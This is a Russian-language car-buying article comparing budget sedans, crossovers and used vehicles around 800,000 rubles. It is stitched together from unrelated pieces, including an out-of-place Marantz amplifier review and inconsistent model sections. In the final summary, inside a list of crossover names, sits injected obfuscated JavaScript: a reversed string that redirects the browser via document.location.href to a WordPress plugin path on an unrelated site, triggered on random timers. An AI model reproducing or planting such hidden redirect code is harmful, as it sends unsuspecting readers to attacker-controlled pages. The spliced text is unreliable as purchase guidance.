Климатический комфорт
Прогрев в течение 14 минут при движении с постоянной скоростью 60 км/ч (за бортом — два градуса мороза). При выкрученных на максимум регуляторах температуры климат-контроли Лады, Фольксвагена и Kia работали в полностью автоматическом режиме, а «ручная» система Hyundai была выставлена на распределение потоков «на стекло и в ноги», скорость вентилятора — вторая.
Если в Kia хорошо подогревается только верхняя часть обода, то в Hyundai — весь руль. Правда, теплая баранка доступна Солярисам начиная со «средней» версии Comfort, а для Rio 1.6 — уже «в базе». Polo и Весте обогрев руля пока недоступен
Ещё по теме: Полный обзор тормозных колодок для Хендай Солярис. Какие колодки поставить на Хендай Солярис
Обзорность
У Rio и Соляриса стойки тоньше вестовских, а зеркала, наоборот, меньше. Но в Kia «устройства непрямого обзора» правильной формы, а в Hyundai — приплюснуты. Благо помогает салонное зеркало: в Солярисе самый большой проем заднего окна.
В Polo он, увы, куда меньше и к тому же сильнее перегорожен подголовниками. А боковые зеркальца Фольксвагена впору назвать макияжными. Стойки лобового стекла самые тонкие, но имеют массивные треугольники в основаниях, перекрывающие обзор даже водителям среднего роста. Вертеть головой в Polo придется больше, чем в других автомобилях.
Лада Веста
Hyundai Solaris
Kia Rio
Volkswagen Polo
Skoda Octavia III
Дебют третьего поколения чешского лифтбека «гольф-класса» состоялся в 2013 году, в 2016 году был произведён небольшой рестайлинг, хотя в Россию такие модели не поставлялись. Автомобиль зарекомендовал себя как надёжное, практичное и безотказное транспортное средство, но найти экземпляр с мощным двигателем по приемлемой цене будет нелегко. Но какую машину вы не купите за 800 000 рублей, можете быть уверены, что она прослужит вам достаточно долго, если не пренебрегать регламентными работами. А выбирать есть из чего, поскольку гамма моторов лифтбека включает 5 агрегатов.
Так какое б/у авто за 800 000 рублей лучше? Прямой ответ на этот вопрос дать невозможно, но в отношении подержанных машин действует общее правило: чем дороже был новый автомобиль, тем больший возраст или пробег будет у него в указанном ценовом диапазоне, так что искать компромиссы всё равно придётся, и это самая сложная часть выбора.
Внутреннее убранство автомобилей
Салон Лады Веста современен и вполне интересен, к тому же имеют неплохую эргономику. В то же время, качество материалов отделки далеко от идеала и это отчетливо прослеживается в гулком, жестком пластике панелей, грубой тканевой обивке и неправдоподобных псевдоалюминиевых накладках.
В центральную консоль интегрирован мультимедийный центр с тачскрином. На экран выводится карта навигации, картинка с камеры заднего вида и данные аудиосистемы. Чуть ниже расположен блок управления климатической системой с собственным монитором индикации — пользоваться блоком удобно.
Приборная панель в колодцах читается хорошо при любых условиях. Однако ее информативность не высока и перед глазами — лишь необходимые данные.
Что касается водительского кресла, то оно обладает широкими диапазонами основных регулировок и приятным профилем — в дальней дороге не устанешь. Вольготно и на втором ряду — даже втроем и при росте в 185 сантиметров.
Внутреннее убранство Хендэ Солярис более вычурное и уютное. Кроме того, и материалы отделки у корейского седана также приятнее. Органы управления организованы логично и все находится в зоне досягаемости рукой водителя, что позволяет последнему не отвлекаться от дороги.
Приборная комбинация с классической компоновкой и белой подсветкой красива и легко воспринимается глазом при различном освещении. Правее от нее расположилось головное устройство с поддержкой навигации, Apple Carplay и Android Auto, сенсорным экраном.
Графика последнего достаточно детализированная, но интерфейс мультимедиа на первых порах понятен будет не каждому.
Передние сиденья с упругим наполнителем комфортны и гостеприимны. Однако продольной регулировки салазок может хватить не каждому, особенно при росте свыше 180 сантиметров.
Тесновато и на заднем диване — даже двум седокам при росте в 175 сантиметров: колени подпирают спинки впереди стоящих кресел, а голова находится в непосредственной близости к крыше, потому в дальней дороге не расслабишься.
Что внутри?
Интерьеры Rio и Solaris хорошо известны, поэтому напомню лишь основные моменты: даром что корейцы, по сути, – близнецы-братья, стилистически это совсем разные продукты. В Rio заметно влияние европейской школы дизайна, Solaris же – типичный «азиат». Я не говорю, что это плохо. Я говорю: меня раздражает синяя подсветка.
А что же отечественный автомобиль? Для начала он радует… дверными ручками. Массивные, под естественный хват, из хорошего пластика. Двери захлопываются с приятным, приглушенным звуком – видно, что подогнаны все кузовные элементы правильно и ровно. Похоже, новые производственные стандарты, внедренные под контролем Renault-Nissan на сборке Вест в Ижевске, принесли-таки свои плоды.
От редактора:Важно отметить, что для этого сравнительного теста нам удалось получить Весту в средней комплектации «Комфорт», которая лишена многих опций. В версии «Люкс» есть и мультимедийное головное устройство с управлением на руле, и подлокотник, и регулировка кресла по высоте
А кроме того, имеется и недоступное корейским иномаркам даже в топовых версиях оборудование: например, охлаждаемый перчаточный ящик и навигация.
Другие варианты
Рассматривая любой их этих автомобилей к предстоящей покупке, не стоит забывать о том, что это не единственные представители своего класса, которые сейчас присутствуют на авторынке в России. Также, потенциальный покупатель может сделать выбор в пользу других бюджетников. В частности, здесь речь идет про авто из Южной Кореи, а именно про Hyundai Solaris и Kia Rio, автомобиль чешского производства Skoda Rapid, а также про китайского представителя данного сегмента Changan Alsvin. Каждая названная машина заслуживает внимания, так как может выделиться на фоне конкурентов за счет своих ключевых особенностей.
Honda Цивик
Цена: 749 000 949 000 рублей;
Освеженный Цивик, который можно будет отыскать в салонах дилеров уже в марте, доступен в 5 базисных комплектациях. В наш бюджет укладываются 1-ые две: Elegance и Lifestyle, которые поставляются только с механическими коробками передач.
Новенькая Honda Цивик 2012 будет иметь несколько версий, включая даже гибридную и с движком, способным работать на газе. Но пока россиянам светит только базисная модификация с аналогичным прежнему 1,8-литровым бензиновым мотором мощностью 140 л.с. и работающим в паре с 5-ступенчатой механической трансмиссией либо Коробка автомат.
Ходовые и технологические качества
Одним из важнейших условий эксплуатации автомобиля являются дороги, на которых он, собственно, и будет ездить. У Лады есть огромное преимущество перед Хендай: ее платформа создана специально для российских дорог и разрабатывалась совместно с заводом Renault-Nissan. В то же время платформа Соляриса тоже адаптирована под непростую езду по дорогам России. Дорожный просвет Весты составляет 171 мм, что на 11 мм больше, чем у Соляриса. Также конструкция кузова Лады более жесткая, шире колея колес. Учитывая все нижеперечисленные факторы, российское детище значительно лучше справляется с неудовлетворительным состоянием наших дорог.
Помимо прочего, запчасти на корейца обойдутся в два раза дороже, что является серьезным обстоятельством при выборе авто.
Сколько стоит ОСАГО на ваш автомобиль?
Поможем узнать стоимость и оформить полис без переплат с учетом скидок за КБМ! · Выбор лучшей цены. Скидка 50%. Официальный полис. Экономия времени. Узнайте цену страховки. Экономия до 3500 ₽.
Кроме того, качество исполнения силовых агрегатов, передаточных частей и различных механических узлов выполнено на высоком технологическом уровне, вследствие чего машина подводит довольно редко, что не может не радовать.
Несомненным плюсом Лады будет ее мягкая подвеска: седан на ура проходит все ямы и неровности дорожного покрытия. Хендай, в общем, тоже не отстает по этому показателю, но лидером в этом соревновании станет российский автомобиль.
Также Лада выигрывает в динамике: отличная управляемость и устойчивость, которые проявляет Веста на дороге завоюет сердца многих автовладельцев. Конечно, из-за массивности и особенностей конструкции машину немного кренит на поворотах, немного хуже Соляриса, но вполне терпимо.
Технические характеристики
HYUNDAI SOLARIS
LADA VESTA
Габариты, вес
Длина, мм
4405
4410
Ширина, мм
1729
1764
Высота, мм
1469
1497
Колесная база, мм
2600
2635
Клиренс, мм
160
178
Снаряженная масса, кг
1259
1380
Полная масса, кг
1610
1670
Объем багажника, л
480
480
Объем топливного бака, л
50
55
Динамика, экономичность
Максимальная скорость, км/ч
192
186
Время разгона 0–100 км/ч, с
11,2
12,1
Расход топлива, л/100 км
городской цикл
8,9
9,3
загородный цикл
5,3
6,0
смешанный цикл
6,6
7,2
Техника
Тип двигателя
бензиновый, 4-цилиндровый
бензиновый, 4-цилиндровый
Рабочий объем, см3
1591
1774
Мощность л.с. при мин-1
123 при 6300
122 при 5900
Крутящий момент Нм при мин-1
150 при 4850
170 при 3700
Трансмиссия
автомат., 6-ступ.
роботизированная, 5-ступ.
Привод
передний
передний
Передняя подвеска
независимая
независимая
Задняя подвеска
полузависимая
полузависимая
Тормоза (передние/задние)
дисковые/дисковые
дисковые/барабанные
Размер шин
195/55R16
195/55R16
Затраты на эксплуатацию*
Транспортный налог, р.
3075
3050
ТО-1/ТО-2, р.
5700 / 9700
5000 / 7000
ОСАГО р.
9858
9858
Каско, р.
65 000
60 000
* Транспортный налог в Москве. ТО-1/ТО-2 — по данным дилера. Каско и ОСАГО — из расчета 1 водитель мужского пола, холост, возраст 30 лет, водительский стаж 10 лет.
Новые кроссоверы за 800 тысяч рублей — претенденты на покупку
Хоть сумма в 800 000 рублей считается вполне приличной, моделей, что можно купить в таком диапазоне, очень немного. Тем не менее, выделяются 5 кандидатов:
- Hyundai Creta – 749 900 руб.;
- Renault Duster – 629 900 — 769 900 руб.;
- Chery Tiggo – 689 900 — 757 900 руб.;
- LIFAN X60 – 629 900 — 789 900 руб.;
- Brilliance V5 – 740 900 — 786 900 руб.
1. Hyundai Creta — новая модель 2016 года
Этот корейский кроссовер — безусловный фаворит списка, ведь модель появилась на рынке в конце лета 2016 года – всего месяц назад. Однако очереди на нее растянулись на многие недели.
Экстерьер
Внешность нового кроссовера выполнена в классическом стиле. Передок смотрится строго, в первую очередь, благодаря рубленому носу, массивной радиаторной решетке и огромному бамперу, с залезающей снизу накладкой, крупным противотуманным фарам и оригинальной оптике.
В профиль налицо фирменные колесные диски, подштамповки на боковине и уходящая резко вверх нижняя линия стекол. Все это отлично гармонирует с короткой кормой, фонарями, заходящими далеко на задние крылья, и пластиковым обвесом по кругу. Сзади все в той же стилистике – пятая дверь, бампер с отражателями, антикрыло и другие моменты.
Технические характеристики
В указанном бюджете можно купить кроссовер только с базовым двигателем, объемом в 1.6 литра. Впрочем, 123-сильного мотора для спокойной и размеренной езды вполне достаточно. Пик мощности он выдает на 6 300 об., а крутящий момент на 4 850 об. достигает 151 Нм. С таким силовым агрегатом Крета разгоняется до сотни за 12.3 сек., достигая максимальной отметки в 169 км/ч. При этом расход топлива даже в городе не выходит за пределы 9 литров.
В паре с мотором работает только 6-ступенчатая механическая коробка. Подвеска полузависимая, с торсионной балкой, гидравлическим усилителем руля, передним приводом и дисковыми тормозами. Клиренс равен 190 мм.
Интерьер
Салон строг и солиден, хотя назвать материалы отделки дорогими все же не выйдет. Тем не менее, перед водителем возвышается 3-спицевый руль, приборная панель не только симпатична, но и превосходно читается, расположение кнопок на центральной консоли грамотно и понятно, да и общий абрис торпедо отлично подходит к внешности авто.
Но за все эти качества придется заплатить очень бедной базовой комплектацией – отсутствием кондиционера, литых дисков, полного электропакета и прочих опций.
2. Renault Duster
Этот кроссовер давно стал иконой не только сегмента кроссоверов в России, но и олицетворением в РФ марки Рено. Неудивительно, ведь на долю Дастера приходится около 40%!всех продаж французской компании.
Экстерьер
Внешность автомобиля достаточно проста и незамысловата. Прямоугольные фары, черная сетка радиаторной решетки, массивный бампер (с накладкой снизу) и ровный капот. Сбоку сильнее всего выделяются раздутые колесные арки, которые кажутся еще больше на фоне самих колес, ровная крыша и прочие подштамповки по кузову.
Сзади кроссовер смотрится довольно просто – небольшие фонари со слаженными краями, аккуратная и скромная пятая дверь, бампер, большую часть которого занимает накладка в его нижней части, и массивная хромированная полоса в центре багажника (с надписью «DUSTER»).
Технические характеристики
Двигатель, которым может быть оснащен паркетник в оговоренном бюджете, только один – 1.6-литровый бензиновый мотор, выдающий на 5 500 об. 114 л. с., дополняя их крутящим моментом в 156 Нм на 4 000 об. Механическая коробка у Рено 5-ступенчатая. С ней кроссовер достигает сотни за 10.9 сек., разгоняясь до 167 км/ч. При этом расход у него вполне приемлемый – 9.3 литра на сотню в городе.
Подвеска, как и у иных представителей сегмента, спереди независимая, типа McPherson. Сзади же стоит торсионная балка. Все это сочетается с передним приводом, 210-миллиметровым дорожным просветом и барабанными тормозами на задней оси. А за 739 990 руб. можно купить Дастер с полным приводом.
Интерьер
После рестайлинга, проведенного в 2015 году, салон стал смотреться свежее и солиднее. Тем не менее, полностью избавиться от ощущения дешевизны так и не удалось. Дизайн прост, как и внешность, с множеством прямых линий и прямоугольной центральной консолью.
Эргономика в целом неплоха, но часть кнопок перекрывается рычагом коробки передач. С другой стороны, читаемость приборной панели на высоте, руль хваткий и удобный, сиденья с неплохой боковой поддержкой, да и сзади места в целом достаточно.
2-е место: Lexus IS250 I
Лексус — это Тойота, а Тойота, как известно, пользуется на российском рынке большим уважением. Соответственно, тем кому не хочется слишком пенсионерской Камри либо излишне громоздкого Lexus GS, имеет смысл присмотреться к данной модели. Она привлекает стремительным и неустаревающим дизайном, респектабельным интерьером, оптимальным балансом между ездовым комфортом и управляемостью, а также приятной динамикой ускорения. Ну и, как-никак, отдельным пунктом идет премиум-направленность японского седана, которая волнует многих соотечественников.
Лексус IS250.
При бережной эксплуатации Лексус ИС250 каких-то особых проблем доставлять не способен. Однако позиция в рейтинге у него понижена из-за того, что активной езды автомобиль не жалует. Из-за нее сильно страдает трансмиссия, склонная к перегреву. Кроме того, у мотора существует «проблема пятого цилиндра» и некоторые конструктивные недостатки системы охлаждения, привода ГРМ. Подробно обо всем перечисленном читайте в нашем обзоре модели .
Немного о технической части седана. Под капотом у него в российской версии трудится бензиновый агрегат 2.5 литра мощностью в 208 лошадиных сил. Трансмиссия — автоматическая, на шесть ступеней. Привод — задний.
Чей кузов лучше
Что касается дизайна, тут все индивидуально. Одним по душе плавный, без излишеств консервативный стиль Polo, другим — икс-концепция Vesta.
Кузов «Лады» длиннее, больше и выше, чем у Polo, и вещей в нее помещается больше. В багажник «Весты» входит 480 л груза, в багажник Polo — 460 л. По клиренсу Vesta тоже выходит победителем. Дорожный просвет у нее 178 мм, у «Поло» — 163 мм. Vesta не задевает бордюры при парковке и уверенно идет по трассе, но на кочках Polo ведёт себя жёстче.
По кузову «Фолькса» нет нареканий. Производитель предоставляет 12-летнюю гарантию на отсутствие сквозной коррозии, чего не скажешь о Vesta. Владельцы жалуются на ржавчину, появляющуюся на сварных швах кузова.
Также читайте: Пять фактов за и против покупки Lada Vesta
Наш вердикт
Hyundai Solaris и Lada Vesta вполне можно признать отвечающими современным требованиям, предъявляемым к автомобилям такого класса. Что же касается существенной разницы в цене, то она обусловлена не тем, что Lada Vesta хуже, а тем, что Hyundai Solaris — иномарка, хотя и производится у нас.
Автомобили для тест драйва предоставлены автосалонами: Hyundai Solaris — «Рольф Лахта», Lada Vesta — «Лада центр Озерки».
Редакция рекомендует:
Почему залегают поршневые кольца и как это предотвратить Сотрудник ГИБДД обыскал мою машину: имел ли он на это право?
Россияне могут остаться без иномарок: западные автоконцерны остановили поставки машин в нашу страну
Во Франции задержан корабль, который вез автомобили в Россию
В России закрылась половина автозаводов
Новости СМИ2
Звук
Усилитель выдает очень свободное красивое звучание с превосходной детализацией, богатыми тембрами и длинными естественными послезвучиями живых инструментов. Сцена выстраивается максимально точно и масштабно, с достоверной передачей пропорций и местоположения виртуальных источников звука в пространстве. Все вполне соответствует представлениям о том, как должен играть хороший усилитель категории High End. Никакой синтетики, жесткости или «дискретности», которую в звучании класса D обнаруживают некоторые адепты старой школы, не наблюдается. Напротив, Marantz PM-KI RUBY успешно сочетает лучшие объективные характеристики с фирменной утонченной и легкой подачей музыкального материала.
Это типично «марантцовское» звучание проявляется, в первую очередь, в излишней интеллигентности при воспроизведении металла и тяжелого рока. В то же время классика любых составов, джаз и вокал звучат очень живо и натурально. Весьма похожий, возможно, даже чуть более красивый и приторный характер звучания проявляли усилители Marantz прошлых лет, работающие в классе АВ, что позволяет сделать вывод о нейтральном характере звучания усилителей мощности класса D.
Подключение к усилителю Marantz PM-KI RUBY акустики разной мощности, с разной чувствительностью и разным импедансом дало вполне ожидаемый результат: отсутствие какой либо выраженной реакции на изменение этих параметров. С любой стереопарой усилитель справлялся одинаково уверенно.
Даже на самой сложной нагрузке и на высокой громкости на удивление стабильно воспроизводились нижние ноты контрабаса — они звучали абсолютно четко, без гула, с натуральной передачей ощущения вибрирующей струны и откликающейся на эту вибрацию деки инструмента. Одним словом, все происходило ровно так, как и должно происходить с усилителем, имеющим заявленное сочетание мощности и коэффициента демпфирования.
Выбор б/у авто до 800 000 руб
Зачастую обычного комфортабельного седана в повседневной жизни не хватает, поэтому автолюбители часто прибегают к услугам вторичного рынка, чтобы приобрести роскошный внедорожник или кроссовер повышенной проходимости. На этом рынке также многообразие различных моделей, но выбирать автомобиль с рук необходимо по совершенно другим критериям. Самое главное – чтобы автомобиль был в надлежащем состоянии, а двигатель не исчерпал свой ресурс. Только тщательный отбор б/у автомобилей обезопасит владельца от головной боли в будущем.
Toyota RAV4 – пожалуй, лучший кроссовер в мире. Цена от 700 тысяч рублей
Toyota RAV4 2004-2006 года выпуска ни в чем не уступает по оснащенности многим современным автомобилям. За счет полного привода и экономичного двигателя на этом автомобиле комфортно передвигаться по нашим дорогам. Двигатель не отличается мощностью, но при разработке инженеры делали упор именно на экономичность. Примерно за 700 тысяч рублей можно стать владельцем RAV4 с 2-литровым двигателем под капотом. За автоматическую коробку передач придётся заплатить сверху 50-75 тысяч. Кроме 2-литрового мотора доступны модификации с мощным 2.5-литровым мотором и 2.2-литровым дизелем. Однако цена на них даже сегодня превышает 1 миллион рублей.
Достоинства Toyota RAV4:
- Недорогое обслуживание;
- Долговечность, большой ресурс мотора;
- Высокая проходимость;
- Экономичность.
Удобный и симпатичный Nissan Qashqai от 600 тыс. рублей
Вложиться в заявленную сумму можно, купив японский кроссовер Nissan Qashqai начальной или средней комплектации с пробегом. Автомобиль отличается надёжной подвеской, удобным и просторным салоном. Лучше всего не приобретать кроссовер самых первых лет производства, а выбор сделать именно в пользу сравнительно новых авто. Плюс ко всему, если добавить 50-100 тысяч, то можно уже приобрести Nissan Qashqai 2. Вторая версия наиболее приспособлена к семейным путешествиям, располагает большим функционалом. Приобрести Nissan Qashqai можно с 1.6-литровым дизельным мотором, 2.0-литровым бензиновым, или стандартным 1.2-литровым мотором мощностью 115 л.с.
Преимущества Nissan Qashqai:
- Высокое качество сборки ходовой части;
- Долговечность, практичность;
- Мощный двигатель;
- Функциональность;
- Просторность салона;
- Экономичность (9-10 л на 100 км пути по городу).
Однако при покупке б/у Nissan Qashqai лучше всего акцентировать своё внимание на механической коробке передач и именно на ней остановить свой выбор. Дело в том, что АКПП Qashqai при пробеге 200 тыс
км часто приносит владельцу хлопоты, связанные с регулярными поломками.
Mazda CX-7: стильный кроссовер ценой от 500 тыс. рублей
На вторичном рынке автомобилей можно встретить большое количество предложений по Mazda CX-7. Попросить за японский кроссовер могут от 500 до 800 тысяч. Почему такой разброс? Всё предельно просто. Не стоит рассматривать подозрительно низкие цены, ведь такая машина сулит массу неприятностей в будущем. По низкой цене могут продавать авто с мотором, ресурс которого на исходе, или же с проблемной трансмиссией. Поэтому, в таком случае не стоит экономить, а лучше заплатить достойную для такого автомобиля сумму, чтобы в будущем не тратить собственное время и нервы на поиски запчастей.
Преимущества Mazda CX-7:
- Просторный пятиместный салон;
- Превосходная динамика, достичь которой удаётся за счет мощного 2.3-литрового турбомотора;
- Электронная система безопасности;
- Качественно выполненный салон;
- Наличие 4-6 подушек безопасности.
Hyundai Santa Fe – корейская практичность. От 600 тыс. рублей
Корейский Hyundai Santa Fe имеет практически схожие преимущества, что и у Mazda CX-7. Исключением является только двигатель. С учетом качества отечественного топлива мотор Santa Fe нуждается в регулярной чистке форсунок, также необходимо периодически менять пластиковые компоненты впускного тракта. Машину в идеале необходимо хранить в гараже, так как при воздействии с влагой в течение продолжительного времени у Hyundai Santa Fe начинаются проблемы с электроникой. Под капотом Santa Fe можно встретить бензиновый 2.4-литровый мотор мощностью 174 л.с. в паре с механической КПП, либо 2.2-литровый турбо дизель мощностью 197 лошадей. В качестве трансмиссии доступен также 6-ступенчатый гидротрансформатор HiVec H-Matic.
Основные достоинства Hyundai Santa Fe:
Подведем итоги
Cамые надежные кроссоверы, рассмотренные в статье.
Это Renault Duster, Nissan Terrano, Hyundai Creta. Ну и подороже Renault Kaptur.
Беспроблемные автомобили, которые у вас будут ходить и ходить.
Если вам эти кроссоверы маленькие, вы хотите более большой, то вы можете посмотреть наш Топ-6 сверху.
И даже те кроссоверы на вариаторе, которые вам не советовал брать, вы можете рассматривать как варианты. Например Nissan Х-Тrail, Nissan Qashqai, Mitsubishi Outldoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ander т.д.
Это не плохие кроссоверы и у них есть масса ярых поклонников. НО.
Duster, Terrano, Creta, Kaptur, это все-таки самые надежные кроссоверы в своем классе.
Они, во-первых, будут свежие, во-вторых будут не убиваемые
И что не мало важно, покатавшись, вы без проблем их продадите